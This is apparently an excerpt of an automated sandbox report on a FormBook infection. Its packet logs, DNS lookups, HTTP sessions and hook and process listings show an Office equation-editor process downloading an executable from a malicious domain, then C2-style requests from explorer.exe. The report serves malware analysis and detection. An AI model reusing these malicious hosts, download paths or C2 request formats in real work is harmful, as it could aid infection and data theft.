                                                    Sep 28, 2021 20:42:28.978029013 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978044987 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978060007 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978065968 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978075027 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978089094 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978105068 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978111029 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978116989 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978132010 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978146076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978154898 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978178024 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978178024 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978183985 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978202105 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978214979 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978224993 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978230000 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978246927 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978260994 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978270054 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978277922 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978293896 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978307009 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978317976 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978329897 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978338957 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978353024 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978359938 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978368044 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978385925 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978394985 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978410006 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978423119 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978430986 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978437901 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978452921 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978473902 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978476048 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978487968 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978499889 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978511095 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978524923 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978532076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978550911 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978564024 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978579044 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978600979 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978602886 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978615046 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978626966 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978640079 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978647947 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978653908 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978681087 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978688955 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978702068 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978728056 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978730917 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978735924 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978763103 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.979481936 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.979509115 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.979530096 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.979554892 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.979566097 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.986963034 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987001896 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987020016 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987034082 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987049103 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987063885 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987093925 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987106085 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987142086 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987143040 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987148046 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987163067 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987175941 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987181902 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987195015 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987202883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987215996 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987226009 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987237930 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987246037 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987257957 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987265110 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987279892 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987284899 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987292051 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987303019 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987318993 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987322092 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987333059 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987341881 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987353086 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987360001 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987375975 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987385035 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987390995 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987407923 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987421036 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987425089 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987443924 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987454891 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987476110 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987495899 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987519026 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987534046 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987538099 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987546921 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987559080 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987572908 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987580061 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987587929 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987601042 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987617970 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987623930 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987633944 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987641096 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987651110 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987663031 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987673044 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987682104 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987693071 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987701893 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987716913 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987725973 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987732887 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987737894 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987754107 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987761974 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987771988 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987776041 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987785101 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987799883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987812042 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987826109 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987837076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987844944 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987859011 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.987862110 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.987870932 CEST4916580192.168.2.22185.239.243.112

                                                    UDP Packets

                                                    Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                                    Sep 28, 2021 20:42:28.710421085 CEST  52167        53         192.168.2.22  8.8.8.8
                                                    Sep 28, 2021 20:42:28.729835987 CEST  53           52167      8.8.8.8       192.168.2.22
                                                    Sep 28, 2021 20:44:09.606345892 CEST  50591        53         192.168.2.22  8.8.8.8
                                                    Sep 28, 2021 20:44:09.656146049 CEST  53           50591      8.8.8.8       192.168.2.22
                                                    Sep 28, 2021 20:44:30.389796972 CEST  57805        53         192.168.2.22  8.8.8.8
                                                    Sep 28, 2021 20:44:30.410459995 CEST  53           57805      8.8.8.8       192.168.2.22

                                                    DNS Queries

                                                    Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                        Type            Class
                                                    Sep 28, 2021 20:42:28.710421085 CEST  192.168.2.22  8.8.8.8  0x8cf9    Standard query (0)  fantecheo.tk                A (IP address)  IN (0x0001)
                                                    Sep 28, 2021 20:44:09.606345892 CEST  192.168.2.22  8.8.8.8  0xc18c    Standard query (0)  www.personowner.guru        A (IP address)  IN (0x0001)
                                                    Sep 28, 2021 20:44:30.389796972 CEST  192.168.2.22  8.8.8.8  0xfc43    Standard query (0)  www.audiofactaesthetic.com  A (IP address)  IN (0x0001)

                                                    DNS Answers

                                                    Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name                        CName  Address          Type            Class
                                                    Sep 28, 2021 20:42:28.729835987 CEST  8.8.8.8    192.168.2.22  0x8cf9    No error (0)  fantecheo.tk                       185.239.243.112  A (IP address)  IN (0x0001)
                                                    Sep 28, 2021 20:44:09.656146049 CEST  8.8.8.8    192.168.2.22  0xc18c    No error (0)  www.personowner.guru               99.83.154.118    A (IP address)  IN (0x0001)
                                                    Sep 28, 2021 20:44:30.410459995 CEST  8.8.8.8    192.168.2.22  0xfc43    No error (0)  www.audiofactaesthetic.com         63.250.43.8      A (IP address)  IN (0x0001)
                                                    Sep 28, 2021 20:44:30.410459995 CEST  8.8.8.8    192.168.2.22  0xfc43    No error (0)  www.audiofactaesthetic.com         63.250.43.7      A (IP address)  IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • fantecheo.tk
                                                    • www.personowner.guru
                                                    • www.audiofactaesthetic.com

                                                    HTTP Packets

                                                    Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
                                                    0           192.168.2.22  49165        185.239.243.112  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Timestamp                             kBytes transferred  Direction  Data
                                                    Sep 28, 2021 20:42:28.781491041 CEST  0                   OUT        GET /ibefrankszx.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: fantecheo.tk
                                                    Connection: Keep-Alive
                                                    Sep 28, 2021 20:42:28.809154034 CEST  2                   IN         HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Tue, 28 Sep 2021 18:42:28 GMT
                                                    Content-Type: application/x-msdownload
                                                    Content-Length: 624640
                                                    Last-Modified: Tue, 28 Sep 2021 03:45:00 GMT
                                                    Connection: keep-alive
                                                    ETag: "61528fbc-98800"
                                                    Accept-Ranges: bytes


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                    1           192.168.2.22  49166        99.83.154.118   80                C:\Windows\explorer.exe
                                                    Timestamp                             kBytes transferred  Direction  Data
                                                    Sep 28, 2021 20:44:09.686778069 CEST  661                 OUT        GET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1
                                                    Host: www.personowner.guru
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 28, 2021 20:44:09.848998070 CEST  661                 IN         HTTP/1.1 403 Forbidden
                                                    Date: Tue, 28 Sep 2021 18:44:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                    2           192.168.2.22  49167        63.250.43.8     80                C:\Windows\explorer.exe
                                                    Timestamp                             kBytes transferred  Direction  Data
                                                    Sep 28, 2021 20:44:30.571886063 CEST  662                 OUT        GET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1
                                                    Host: www.audiofactaesthetic.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 28, 2021 20:44:30.735729933 CEST  663                 IN         HTTP/1.1 404 Not Found
                                                    content-type: text/html
                                                    date: Tue, 28 Sep 2021 18:44:30 GMT
                                                    transfer-encoding: chunked
                                                    connection: close
                                                    Data Ascii: 31EA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website is being created</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="apple-touch-icon" href="data:image/png;base64,
                                                    Data Ascii: JWnp3YcX3JURg1rl7tJ2Ud2w1ybz5phxry3rLpsCN8EDyJTd8ROrrcYXxHDvdR2cJ3/iALzxymQhrofNPFgzT4Z2sUSoAnISUj50TBmZKKmoaWCx1Xem4M3HkxCRUmUqp02XIVqtBTX/3SpE2XPkPGTKWXWV5lHelAO+22V6P9DjrsqGatOnXrddIQ6RMG/LsMYjJwHD3GjffJcerYW/2cbUmIC7pmQ5/0dPj0YrWPfaXh2fCWO
                                                    Sep 28, 2021 20:44:30.735888004 CEST674INData Raw: 6d 56 44 2f 57 69 4b 58 47 50 39 79 62 78 76 2b 54 36 67 78 38 6d 50 35 63 41 49 63 55 79 4c 6f 78 62 56 2f 46 6f 49 78 32 2b 63 34 61 35 59 51 49 45 77 55 2f 6c 4e 5a 65 6a 32 46 61 45 54 30 6c 2b 67 54 67 30 56 63 6f 77 2b 53 41 49 67 4c 35 49
                                                    Data Ascii: mVD/WiKXGP9ybxv+T6gx8mP5cAIcUyLoxbV/FoIx2+c4a5YQIEwU/lNZej2FaET0l+gTg0Vcow+SAIgL5IVSS1rEJMCYL3WHF0whC5L1Ar/KPslVH+k6CkVCOQM1yu8rnNyttA2VzrB9LgFgG6u3EWclTuyA7QZ+j1NQ7sQU00+b0vFyqO4eQ9mKm9Ht6qQWjIUMXF8xBlEgNZRXRP7+CASJwCEUIWP668lC9+uN4/brUYN2fbQ
                                                    Sep 28, 2021 20:44:30.735902071 CEST675INData Raw: 4a 57 73 47 62 44 6c 70 33 2b 48 71 4f 73 6f 38 71 64 71 46 53 63 79 6e 6c 63 76 6f 63 62 68 6b 6d 56 56 6b 41 74 74 4a 4e 43 71 30 75 6c 30 52 6c 4d 46 70 76 44 35 51 6d 45 49 72 47 6b 6e 6e 49 62 34 41 32 4e 6a 45 31 79 70 75 41 44 6f 53 49 52
                                                    Data Ascii: JWsGbDlp3+HqOso8qdqFScynlcvocbhkmVVkAttJNCq0ul0RlMFpvD5QmEIrGknnIb4A2NjE1ypuADoSIRVf3UUIIkPZZHAHoHZK8UpLFtdQgu7T3G9rJrZDDSVjnjDywyNyELiFCpCSg7coAZuZ6/AG9rzopMzJjMh4S489IfxGapXOegGc3qkT4Ody5cBeGOOheiKZI+8Dn3UJx3ga+FiUlU8kTSIQ1HrlOsS7qXvTJ3TamL8
                                                    Sep 28, 2021 20:44:30.898358107 CEST677INData Raw: 33 46 43 30 0d 0a 47 33 34 54 48 64 44 68 33 5a 49 51 41 67 41 63 41 6f 4f 57 63 73 68 69 79 65 38 71 43 79 41 36 71 44 5a 55 4a 73 54 59 68 41 67 44 67 31 71 6c 6b 64 6d 41 42 4b 43 42 44 59 49 69 55 30 57 62 4e 49 39 4d 53 72 56 69 7a 59 63 74
                                                    Data Ascii: 3FC0G34THdDh3ZIQAgAcAoOWcshiye8qCyA6qDZUJsTYhAgDg1qlkdmABKCBDYIiU0WbNI9MSrVizYctOOvQdt3kFVRFxMG99FQUAAAAaGRgaGY8mNe5dNp0IK5viu2rcHqKDqwATaLbzcpxOwDsRuOp2G7MJgyxEAEnolXNCFnabqBm02E8X45B1dIeeXttzgaXXyC3idrjrXrpP8yC465bnEp/SI3CKj9CXUWdCfARxhYXI


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function Name | Hook Type | Active in Processes
                                                    PeekMessageA | INLINE | explorer.exe
                                                    PeekMessageW | INLINE | explorer.exe
                                                    GetMessageW | INLINE | explorer.exe
                                                    GetMessageA | INLINE | explorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: USER32.dll
                                                    Function Name | Hook Type | New Data
                                                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE9
                                                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE9
                                                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE9
                                                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE9

                                                    System Behavior

                                                    General

                                                    Start time:20:42:18
                                                    Start date:28/09/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                    Imagebase:0x13fc30000
                                                    File size:1423704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:20:42:19
                                                    Start date:28/09/2021
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                    Imagebase:0x400000
                                                    File size:543304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:20:42:20
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Antivirus matches:
                                                    • Detection: 20%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Start time:20:42:24
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Start time:20:42:24
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                    General

                                                    Start time:20:42:25
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0xffa10000
                                                    File size:3229696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                    General

                                                    Start time:20:43:03
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                                    Imagebase:0x5e0000
                                                    File size:20992 bytes
                                                    MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
